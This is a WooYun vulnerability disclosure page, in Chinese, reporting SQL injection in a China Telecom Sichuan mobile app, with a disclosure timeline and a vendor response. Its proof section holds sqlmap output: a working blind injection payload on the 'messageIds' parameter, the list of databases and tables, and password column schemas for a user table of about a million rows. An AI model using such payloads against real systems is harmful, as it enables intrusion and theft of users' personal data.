当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0212836

漏洞标题:流流顺SQL注入漏洞(影响百万四川电信用户)

相关厂商:中国电信

漏洞作者: Chora

提交时间:2016-05-25 22:09

修复时间:2016-07-11 14:40

公开时间:2016-07-11 14:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-25: 细节已通知厂商并且等待厂商处理中
2016-05-27: 厂商已经确认,细节仅向厂商公开
2016-06-06: 细节向核心白帽子及相关领域专家公开
2016-06-16: 细节向普通白帽子公开
2016-06-26: 细节向实习白帽子公开
2016-07-11: 细节向公众公开

简要描述:

滴,老年卡。

详细说明:

基本是四川电信用户都知道流流顺这个APP。存在问题的地方在删除信息功能

1.jpg

2.png

漏洞证明:

POST parameter 'messageIds' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
---
Parameter: messageIds (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: token=10D0C20E2A11DF7700D3FFE44604EF36AE6A0F24443F42CAD57E153DD9A0BE886DFB71ABA71DEC3A397B6F476B4A0AA0475824943C38B725&messageIds=150130320) AND 1670=1670 AND (5658=5658
---
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] SCWY
[*] SCWY_WEIXIN_1W
[*] SYS
[*] SYSTEM
[*] XDB
Database: SCWY
[151 tables]
+------------------------------+
| TD_SIGNIN_A????? |
| INTF_AGENT_AREA |
| INTF_AGENT_STAFF |
| OMS_REPORT_SORT |
| OMS_REP_ACTIVITY |
| TD_ACTIVITY_SHOW_CONFIG |
| TD_ACTIVITY_TARGET_USER |
| TD_APP_GUESS |
| TD_BANK_LIST |
| TD_BUSI_NAME_LIST |
| TD_CALL_INTERFACE_CONFIG |
| TD_CITY |
| TD_CODE_INFO |
| TD_CONSUMPTION_CONFIG |
| TD_CONTENT_CONFIG |
| TD_CT_NBR_CONFIG |
| TD_ECP_SHELF |
| TD_FLOW_RECOMMEND_CONFIG |
| TD_GIVE_GOLD_CONFIG |
| TD_GOLD_ACTIVITY_CONFIG |
| TD_GOODS_RECOMMEND |
| TD_GOODS_VOUCHER |
| TD_HB_OCS_CONFIG |
| TD_HW_SHOW_CONFIG |
| TD_INTEGRAL_GOODS |
| TD_JTFGOP_MAP |
| TD_MAIN_ACTIVITY_CONFIG |
| TD_MAIN_GOLDGAME_CONFIG |
| TD_MAIN_MENU_CONFIG |
| TD_NON_CANCEL_PROD |
| TD_ORDER_ERROR_INFO |
| TD_ORDER_GOODS_GOLD |
| TD_SCENE_CONFIG |
| TD_SHARE_CONTENT |
| TD_SHARE_IMAGE |
| TD_WINDOW_CONFIG |
| TFA_APP_ORDER |
| TF_CARDPAYMENT |
| TL_GIVE_GOLD_LOG |
| TL_GOLD_ANNOUNCEMENT_LOG |
| TL_GOLD_DETAIL_SIGNIN |
| TL_HW_SMS_CODE |
| TL_LUCKYDRAW_CHANCE_LOG |
| TL_SIGNIN_LOG |
| TMP_GOLD_ORDER_COUNT |
| TM_ACC_NBR_LIST |
| TM_ACC_NBR_LIST2 |
| TM_ACC_NBR_LIST_RULE |
| TM_ACC_NBR_LIST_RULE2 |
| TM_ACTIVE_USER_LIST |
| TM_ACTIVITY |
| TM_ACTIVITY_LOG |
| TM_ACTIVITY_LOG_TEMP |
| TM_ACTIVITY_PRODUCT |
| TM_ACTIVITY_RULE |
| TM_APP_DATA_GATHER |
| TM_APP_DOWNLOAD_LOG |
| TM_APP_ERROR_LOG |
| TM_APP_GROUP |
| TM_APP_INFO |
| TM_APP_PICTURE |
| TM_BAIDU_CODE |
| TM_CHANNEL |
| TM_CITY_MAP |
| TM_CUSTOMER |
| TM_CUSTOMER_TEMP |
| TM_ECP_E9 |
| TM_FAQ |
| TM_FIFA_APP |
| TM_FIFA_MATCH |
| TM_FIFA_MATCH_RESULT |
| TM_FIFA_MATCH_RESULT_LOG |
| TM_FIFA_NEWS |
| TM_FIFA_RANK |
| TM_FIFA_RANK_RESULT |
| TM_FIFA_TEAM |
| TM_FLOW_CONVERSION_GOODS |
| TM_FLOW_CUSTOMER |
| TM_FLOW_IMAGE |
| TM_FLOW_ORDER_LOG_1507 |
| TM_FLOW_SUGGESTION |
| TM_GOLDBAG_RECEIVE |
| TM_GOLDBAG_SEND |
| TM_GOLD_DETAIL |
| TM_GOLD_GIVE_LOG |
| TM_GOLD_GOODS |
| TM_GOLD_ORDER |
| TM_GOODS |
| TM_GOODS_CHANNEL |
| TM_GOODS_GOLD |
| TM_GOODS_PRICE |
| TM_GOODS_SHELF |
| TM_HD_TROPHY |
| TM_HOBBY_LABEL |
| TM_HW_USER |
| TM_IOS_CERTIFICATE |
| TM_LLS_GOODS_CONTRAST |
| TM_MANAGEMENT_AUTHORITIES |
| TM_MANAGEMENT_USER |
| TM_MESSAGE_CODE |
| TM_MESSAGE_LOG |
| TM_MOBILE_LOGIN_BAK_201507 |
| TM_MOBILE_LOGIN_TEMP |
| TM_NON_COACH_LIST |
| TM_NON_COACH_LIST_TEMP |
| TM_ORDER |
| TM_ORDER_E9_TEMP |
| TM_ORDER_GOLD_RULE |
| TM_ORDER_PKG_LIST |
| TM_ORDER_VOUCHER_LOG |
| TM_PRIZE |
| TM_PRIZE_LOG |
| TM_PRODUCT |
| TM_PRODUCT_SPECIFICATION |
| TM_PROD_FEE |
| TM_PUSH_ACCOUNT_INFO |
| TM_PUSH_CONFIG |
| TM_PUSH_CUSTOMER |
| TM_PUSH_CUSTOMER_RULE |
| TM_PUSH_USER |
| TM_QUESTION_CONTENT |
| TM_QUESTION_LIST |
| TM_QUESTION_OPTION |
| TM_QUESTION_RESULT |
| TM_RANDOM_CODE_1507 |
| TM_SHARE_CONFIG |
| TM_SHARE_LOG |
| TM_SHELF |
| TM_SHELF_COMPOSITION |
| TM_SHORT_MESSAGE |
| TM_SHORT_MESSAGE_RECORD |
| TM_SMARTPHONE_LIST |
| TM_STAFF_FEE_TOTAL_TMP |
| TM_TARGET_USER |
| TM_TASK_INFO |
| TM_TASK_INVITE_CODE |
| TM_TASK_INVITE_DETAIL |
| TM_TASK_PRIZE_LOG |
| TM_TASK_RANK_SHOW |
| TM_TASK_SHARE_CONFIG |
| TM_TASK_TYPE |
| TM_TASK_USER |
| TM_TASK_VISIT_LOG_BAK_201507 |
| TM_TASK_VISIT_TYPE |
| TM_USER_BASE_INFO |
| TM_USER_GOLD |
| TM_USER_GOLD_DETAIL |
| TM_USER_GOLD_TOTAL |
| TM_USER_LOGIN_LOG |
| TM_VERSION_UPGRADE |
| TM_VERSION_UPGRADE_LOG |
+------------------------------+
Table: TM_PUSH_USER
[10 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| ACTION | VARCHAR2 |
| ACC_NBR | VARCHAR2 |
| CHANNEL_ID | VARCHAR2 |
| CREATE_TIME | DATE |
| CUSTOMER_ID | NUMBER |
| DEVICE_TOKEN | VARCHAR2 |
| ID | NUMBER |
| IOS_ANDROID | VARCHAR2 |
| STATE | VARCHAR2 |
| USER_ID | VARCHAR2 |
+--------------+----------+
Database: SCWY
Table: TM_HW_USER
[7 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| CREATE_TIME | DATE |
| ID | NUMBER |
| INVITE_CODE | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PHONE | VARCHAR2 |
| SECRET_PASSWORD | VARCHAR2 |
| SMS_PHONE | VARCHAR2 |
+-----------------+----------+
Database: SCWY
+------------+---------+
| Table | Entries |
+------------+---------+
| TM_HW_USER | 1034067 |
+------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 Chora@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-27 14:32

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-26 01:14 | answer 认证白帽子 ( 普通白帽子 | Rank:453 漏洞数:54 | 答案)

    前排

  2. 2016-05-26 08:08 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    你关注的白帽子 Chora 发表了漏洞s 你关注的白帽子 Chora 发表了漏洞 流流顺SQL注入漏洞(影响百万四川电信用户)

  3. 2016-05-26 08:47 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1890 漏洞数:157 | 不要患得患失,我羡慕你,但是我还是选择做...)

    不是可以免费领流量么,怎么不多领点。

  4. 2016-05-26 09:13 | Chora 认证白帽子 ( 普通白帽子 | Rank:397 漏洞数:27 | 生存、生活、生命。)

    @小胖子 记得来看我,给我送饭。。。